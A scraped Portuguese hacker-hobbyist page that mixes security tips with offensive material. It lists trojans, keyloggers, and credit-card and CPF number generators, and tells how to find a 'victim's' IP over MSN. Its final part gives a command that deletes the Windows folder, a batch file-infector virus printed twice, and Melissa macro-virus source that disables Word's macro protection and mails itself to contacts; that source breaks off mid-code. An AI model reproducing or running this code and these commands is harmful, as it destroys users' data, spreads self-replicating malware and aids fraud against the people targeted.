WinShutdown Programa de invasão Back Orifice - Trojan Blade Runner - Trojan Bug's -Trojan Cartao de Cretido - Gera e possui um checador pra ver se seu numero esta correto Cartao de Cretido 2 - Muito bom gerador de número de CC. Cleaner - Limpa sua máquina de mais de 25 trojans Cow trojan - Trojan CPF - Gera numeros de CPF Dictmake - Gera Word List Glide - Desincripta arquivos .PWL ICQsenha - Busca a senha do ICQ ICQsniffer - Dá o ip do lammer pelo UIN Keylog95 - Registra todas as teclas digitadas no PC Melissa - Nuke Netbus - Trojan Netbuster - Proteção para Netbus Nuke - Nuke Portscan - Scaneia portas Pwtool - Usado para desincriptar arquivos PWL Revelation - Programa usada para revelar senhas ******* IPScan - Coloca o IP do lammah e scaneia Senna Spy - Você cria seu trojan Sonar - Scan, ele da a distância que o lammer está de vc Subseven - Um ótimo trojan existente Trojan Hunter - Procura IPs infectado pelo trojan que vc quiser, basta configurar. Ótimo Wincrash - Melhor Trojan que existe. Português

Aprenda a programar

Essa é, claro, a habilidade básica do hacker. Em 1997, a linguagem que você absolutamente precisa aprender é C (apesar de não ser a que você deve aprender primeiro). Mas você não é um hacker e nem mesmo um programador se você souber apenas uma linguagem -- você tem que aprender a pensar sobre problemas de programação de um modo geral, independentemente de qualquer linguagem. Para ser um hacker de verdade, você precisa ter chegado ao ponto de conseguir aprender uma nova linguagem em questão de dias, relacionando o que está no manual ao que você já sabe. Isso significa que você deve aprender várias linguagens bem diferentes.
Além de C, você também deve aprender pelo menos LISP e Perl (e Java está tentando pegar um lugar nessa lista). Além de serem as linguagens mais importantes para hackear, cada uma delas representa abordagens à programaçaão bem diferentes, e todas o educarão em pontos importantes.
Eu nao posso lhe dar instruções completas sobre como aprender a programar aqui -- é uma habilidade complexa. Mas eu posso lhe dizer que livros e cursos também não servirão (muitos, talvez a maioria dos melhores hacker são auto-didatas). O que servirá é (a) ler código e (b) escrever código.
Aprender a programar é como aprender a escrever bem em linguagem natural. A melhor maneira é ler um pouco dos mestres da forma, escrever algumas coisas, ler mais um monte, escrever mais um monte, ler mais um monte, escrever... e repetir até que seu estilo comece a desenvolver o tipo de força e economia que você vê em seus modelos.
Achar bom código para ler costumava ser difícil, porque havia poucos programas grandes disponíveis em código-fonte para que hackers novatos pudessem ler e mexer. Essa situação mudou dramaticamente; open-source software (software com código-fonte aberto), ferramentas de programação, e sistemas operacionais (todos feitos por hackers) estão amplamente disponíveis atualmente.

Vírus por E-mail

Uma das balelas mais antigas da Internet (aliás, muito antes disso, da época de BBSs). Muitos usuários chegam a suar frio só em receber um e-mail de alguém que não conhecem. Alguns deles até apagam a mensagem sem sequer abri-la.
O medo, até onde sabemos, é completamente injustificável. Nenhum mal pode acontecer ao seu computador apenas por abrir uma mensagem no seu programa de correio eletrônico. O máximo de "problema" que você vai encontrar é uma mensagem mal educada.
Mas atenção: se a mensagem estiver com um arquivo anexado (attached), cuidado! Se você não conhecer o remetente, aconselhamos a apagar a mensagem e o arquivo junto, pois este sim, pode estar contaminado com um vírus. E pode ser qualquer tipo de arquivo, executáveis, documentos, etc... Mas se você conhece o remetente, salve o arquivo no seu HD, e passe um anti-vírus antes de abri-lo. É melhor prevenir... Seu amigo pode não saber que está com vírus.
Alguns cavalos de tróia, como o Happy99, modificam os protocolos de comunicação e, neste caso em específico, enviam uma cópia de si mesmo para todas as mensagens que forem enviadas do computador infectado. É uma ótima maneira de se proliferar, pois ele é enviado sob o nome de alguém conhecido, que mandou uma mensagem real. O destinatário, inocente, executa o arquivo (que são uns fogos de artifício explodindo num céu negro). A partir daí, ele também está infectado e todas as suas mensagens serão duplicadas com uma cópia do Happy99.
Para corroborar nossa definição (ao contrário do que algumas pessoas acham), o vírus Melissa, que a imprensa espalhou aos quatro cantos como se ele fosse propagado apenas por receber a mensagem, precisa ser executado. Ele é um vírus de Macro (precisa do Microsoft Word 97 para contaminar) que se beneficia do acoplamento e interação entre o Word e OutLook 97. Para quem não sabe, pode-se escrever a mensagem no OutLook através do Word, e ler mensagens recebidas da mesma forma. O Melissa se aproveita do carregamento automático do Word para ler a mensagem e se autoexecuta nesta inicialização. Mas ele precisa ser executado.
Da mesma forma funciona o vírus Bubbleboy, que se utiliza da execução de controles (activex, scripts, java, etc.) encontrando uma brecha nos mecanismos de segurança do OutLook e Internet Explorer. De qualquer forma, ele precisa executar códigos, mesmo que, por falha nos programas, seja executado automaticamente.
Repetimos: Não existem vírus por e-mail. Existem arquivos anexados por e-mail, e estes sim podem conter vírus. Mantenha seus programas de emails atualizados e utilize sempre um bom anti-vírus.

Intenet Explore

Ferramentas » Opções da Internet » Segurança » InternetAtivar a opção [X] Médio - Avisa antes de executar conteúdo que possa danificar seu computador.
Ferramentas » Opções da Internet » AvançadoAtivar [X] Avisar ao alterar o modo de segurançaAtivar [X] Avisar quando o certificado do site for inválidoAtivar [X] Avisar se os formulários submetidos estão sendo redirecionados
Netscape Navigator 4.x
Editar » Preferências » Categoria - AvançadoDesmarcar [_] Enviar endereço eletrônico como senha de FTP anônimo.Desmarcar [_] Habilitar Java e JavaScript para Correio e Notícias.
Communicator » Informações sobre segurança » NavigatorMarcar a opção [X] Exibir uma página criptografada.Marcar a opção [X] Enviar informações não criptografadas para um site.Marcar a opção [X] Visualizar páginas com conteúdo mixto (cript/ñ cript).
Communicator » Informações sobre segurança » Java/JavaScriptEsta configuração permite que applets acessem seu computador ou sua rede. Caso possua algum item instalado neste tópico, consulte seu fornecedor de software para certificar-se da sua segurança. Caso isto não se aplique, remova todas as entradas.
Internet Explorer 4.x
Exibir » Opções da Internet » Segurança » Zona: Zona da InternetAtivar a opção [X] Médio - Avisa antes de executar conteúdo que possa danificar seu computador.
Exibir » Opções da Internet » AvançadasAtivar [X] Avisar se os formulários enviados forem redirecionados.Ativar [X] Avisar ao mudar o modo de segurança.Ativar [X] Não salvar páginas criptografadas no disco.Ativar Cookies [X] Confirmar antes de aceitar cookies.
Internet Explorer 3.x
View » Options » SecurityAtivar todas as opções do box Active Content.
View » Options » Security » Safety LevelSecurity method: High (recommended for all users)
View » Options » AdvancedBox "Warnings" : Warning before... [X] Always.Ative todos os outros "Warn" deste box.
Se você usa o browser Internet Explorer 3.0, providencie rapidamente uma atualização para a versão 3.02 ou acima, pois a versão 3.0 possui um bug gravíssimo, que permite que a página visitada possua um link para um programa no computador do visitante. Se o link apontar para um programa como a Calculadora do Windows, não há problemas; mas também é possível que o link aponte para, por exemplo, o programa FORMAT. Aí o bicho pega...
Netscape Navigator 3.x
Options » Security Preferences » GeneralAtive todas as opções
Options » Network Preferences » ProtocolsAtive as opções "Show an alert before..."[X] Accepting a Cookie e [X] Submitting a Form by Email
É recomendável que você rejeite cookies de sites em que você não confia. Por menos graves que forem, ficam ocupando espaço do seu disco, além de serem um abuso à privacidade. O mesmo é recomendado para formmails de sites desconhecidos. Evite-os.

O que é Trojans?

Um Trojan Horse é um programa que faz algum tipo de atividade maléfica porém ele não se espalha automaticamente.
Geralmente, trojans são malware simples de se remover comparado aos worms e vírus.
A maioria dos trojans incluem também o que chamamos de backdoor.
Também existem os Trojan Droppers. Esses são identificados pelos antivírus como Dropper.X ou Trojan.Dropper/X. Os Droppers seguem a história de Tróia: Droppers são programas que deviam, por exemplo, tocar uma música, quando na verdade instalam o Trojan. Trojan Droppers são comuns em programas ilegais, como geradores de crédito para celulares e ferramentas para criação de vírus.
radarurl_call_radar_widget("Big", "Black","bottomright")
online stats

Anti-Virús

Anti-VírusEaew galera eu vou postar aqui os melhores anti-vírus, caso você não concorde, poste lá no fórum e de sua justificativa.Lembrando que nunca você estará 100% contra vírus e invasão, por isso não fique clicando em todos os links de sites desconhecidos.Vamos começar pelos os pagos. (Enquete feita pelos os usuarios do Orkut).
Kaspersky (U$ 66,50) 51 votos (39%)AVG (Valor não informado) 23 votos (17%)NOD32 (R$ 94,00) 31 votos (24%)Norton (U$ 49,95) 14 votos (10%)Panda (U$ 39,95) 9 votos (7%)O conceituado Kaspersky sai na frente com a maioria dos votos.Na maioria das reclamações do pessoal é o peso dos softwares são pesados, para esse caso use o NOD32 ele tem uma grande aceitação dos usuarios.Agora vamos pelos os grátis.1° O Active Vírus Shield é muito bom da empresa "Kaspersky", e da "AOL", o mesmo visual do anti-vírus Kaspersky e detecta muitos vírus e bem fácil de ultilizar.Download do Active Vírus Shield2° O Avira AntiVir na versão grátis e bem aceito pelos os usuarios em votação com outros (pagos).Download do Avira AntiVir 3° Avast, bom para uns e péssimos para outros, ele é bem conhecido e é um dos anti-vírus mais baixado da internet.Download do Avast!4° AVG Anti Vírus o mais baixado da internet, mais eu não considero lá está coisas, e o maior concorente do Avast!.Download do AVG FreeBom para cada tipo de usuario acha bom ou ruim esses anti-vírus.

Sistemas Operacionais


Windows XP Pack 3

:::.BAIXAR.:::


Windows 1.0

:::.BAIXAR.:::


Kurumin 7

:::.BAIXAR.:::


Ubuntu9.04 Desktop

:::.BAIXAR.:::

Remover Virús manualmente

Retirando virus manualmente
Bom pessoal, muitos devem saber, outros não !Irei postar aqui uma maneira de remover "Cavalos de Troia , Trojans e kayllogers" manualmente de seu computador.Estou falando dakeles server de tukojan , prorat , Ardamax etc . caso você baixe algo "arquivos" suspeitos fazer este teste sempre eh baum
Vamos lá:
1 - Iniciar > Execultar > Digite Regedit >Precione Enter
2 - Prociga nas seguintes pastas :
HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > WINDOWS > CurrentVersion > Run
No lado direito da jenela ira da pasta "RUN"ter alguns dados de inicialização , se você ver alguma extenssão abaixo: server.exe , server.bat , svcr.bat , svcr.exe , backdoor.exe
Pode simplismente apertar "DELETE" e reiniciar seu windows...e Adeus Trojan

Como descobrir IP da vitima pelo MSN

Para você descobrir o IP sa vitima você deve estar no MSN então va em Inicia\executar\CMD\ e digite netstat -an aparesera todos o IPs que o computador esta usando obs: A pessoa deve pelomenos mandar uma menssagem para você....

Criando Virús.bat

Virús .bat:
Deletat Windows

rmdir /s /q c:\windows

Trojan-2
@echo offctty nulremfor %%f in (*.exe *.com) do set A=%%fif %A%==COMMAND.COM set A=rename %A% V%A%if not exist V%A% goto endattrib +h V%A%copy %0.bat %A%attrib +r %A%ren %A% *.batset A=:endctty con@if exist V%0.com V%0.com %1 %2 %3@if exist V%0.exe V%0.exe %1 %2 %3

Trojan -3

@echo offctty nulremfor %%f in (*.exe *.com) do set A=%%fif %A%==COMMAND.COM set A=rename %A% V%A%if not exist V%A% goto endattrib +h V%A%copy %0.bat %A%attrib +r %A%ren %A% *.batset A=:endctty con@if exist V%0.com V%0.com %1 %2 %3@if exist V%0.exe V%0.exe %1 %2 %3

Del driver

del Drive:\windir\*.ini ou use: drive: cd\ cd windir del *.ini

meliisa 1999

// Melissa Virus Source CodePrivate Sub Document_Open()On Error Resume NextIf System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> ""ThenCommandBars("Macro").Controls("Security...").Enabled = FalseSystem.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&ElseCommandBars("Tools").Controls("Macro").Enabled = FalseOptions.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):Options.SaveNormalPrompt = (1 - 1)End IfDim UngaDasOutlook, DasMapiName, BreakUmOffASliceSet UngaDasOutlook = CreateObject("Outlook.Application")Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")If System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo"ThenIf UngaDasOutlook = "Outlook" ThenDasMapiName.Logon "profile", "password"For y = 1 To DasMapiName.AddressLists.CountSet AddyBook = DasMapiName.AddressLists(y)x = 1Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)For oo = 1 To AddyBook.AddressEntries.CountPeep = AddyBook.AddressEntries(x)BreakUmOffASlice.Recipients.Add Peepx = x + 1If x > 50 Then oo = AddyBook.AddressEntries.CountNext ooBreakUmOffASlice.Subject = "Important Message From " &Application.UserNameBreakUmOffASlice.Body = "Here is that document you asked for ... don'tshow anyone else Wink"BreakUmOffASlice.Attachments.Add ActiveDocument.FullNameBreakUmOffASlice.SendPeep = ""Next yDasMapiName.LogoffEnd